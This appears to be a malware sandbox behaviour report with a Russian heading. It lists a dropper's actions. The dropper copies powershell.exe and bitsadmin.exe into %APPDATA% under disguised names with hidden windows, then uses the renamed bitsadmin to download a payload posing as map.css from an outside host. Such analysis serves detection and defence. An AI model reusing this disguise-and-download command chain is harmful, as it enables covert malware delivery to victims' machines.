Техническая информация
- '%APPDATA%\mgiens.exe' /transfer vcbdVU /download https://sheyenneweber.com/webol/adf/map.css %APPDATA%\map.css
- %APPDATA%\zmgiens.exe
- %APPDATA%\mgiens.exe
- DNS ASK sh####neweber.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zMGIens.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\MGIens.exe' (со скрытым окном)
- '%APPDATA%\mgiens.exe' /transfer vcbdVU /download https://sheyenneweber.com/webol/adf/map.css %APPDATA%\map.css' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zMGIens.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\MGIens.exe